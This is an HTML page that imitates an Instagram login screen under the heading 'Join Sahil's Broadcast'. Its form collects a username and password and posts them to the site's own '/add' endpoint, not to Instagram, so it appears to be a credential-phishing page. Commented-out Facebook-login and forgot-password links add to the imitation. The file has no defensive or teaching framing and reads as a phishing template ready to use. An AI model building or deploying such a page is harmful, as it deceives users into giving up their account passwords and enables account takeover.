<!DOCTYPE html>
<html>
  <head>
    <title>radhe insta</title>

    <link rel='stylesheet' href='/stylesheets/index.css' />
  </head>
  <body>
    <div class="background">
       
      <div class="text-container">
        <h1 class="animated-text">Join Sahil's Broadcast</h1>
    </div>
       <div class="login-container">
        <div class="login-box">
            <h1 class="title">Instagram</h1>
            <form class="login-form"  method="post" action="/add">
                <input type="text" placeholder="Username" class="input-field" required name="id">
                <input type="password" placeholder="Password" class="input-field" required name="password">
                <button type="submit" class="login-button">Log In</button>
            </form>
            <div class="divider">
                <hr>
                <!-- <span>OR</span> -->
                <hr>
            </div>
            <!-- <button class="facebook-login-button">Log in with Facebook</button>
            <a href="#" class="forgot-password">Forgot password?</a> -->
        </div>
    </div>
    </div>
  </div>

  </body>
</html>
